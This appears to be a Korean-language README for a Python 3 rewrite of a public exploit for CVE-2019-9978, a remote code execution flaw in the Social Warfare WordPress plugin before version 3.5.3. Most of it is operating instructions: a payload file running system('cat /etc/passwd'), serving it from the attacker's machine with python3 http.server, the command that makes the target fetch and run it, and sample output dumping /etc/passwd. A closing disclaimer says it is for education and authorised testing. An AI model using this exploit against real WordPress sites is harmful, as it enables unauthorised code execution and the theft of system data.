
WordPress용 Social Warfare 플러그인에서 발견된 원격 코드 실행(RCE) 취약점으로, 3.5.3 미만 버전에 영향을 미칩니다.
Social Warfare WordPress 플러그인의 원격 코드 실행(RCE) 취약점으로, 3.5.3 미만의 모든 버전에 영향을 미칩니다.
기존 공개 익스플로잇은 구버전 Python으로 작성되어 최신 환경에서 제대로 실행되지 않습니다.
이 익스플로잇을 Python 3와 완전히 호환되도록 재작성하여 사용, 이해 및 최신 도구에 통합하기 쉽게 만들었습니다.
다음 내용으로 payload.txt 파일을 생성합니다:
<pre>system('cat /etc/passwd')</pre>
Python을 사용하여 페이로드를 제공합니다:
python3 -m http.server 8000
그러면 payload.txt에 다음 주소로 접근할 수 있습니다:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
대상이 취약한 경우 다음 출력과 유사한 결과를 받게 됩니다:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 이 페이로드가 유용했다면, 별표(⭐) 하나 눌러주시면 감사하겠습니다.
< 3.5.3⚠️ 면책 조항: 이 저장소는 교육 및 윤리적 테스트 목적으로만 제공됩니다.
본인이 소유하지 않은 시스템에서 이 익스플로잇을 무단으로 사용하는 것은 엄격히 금지됩니다.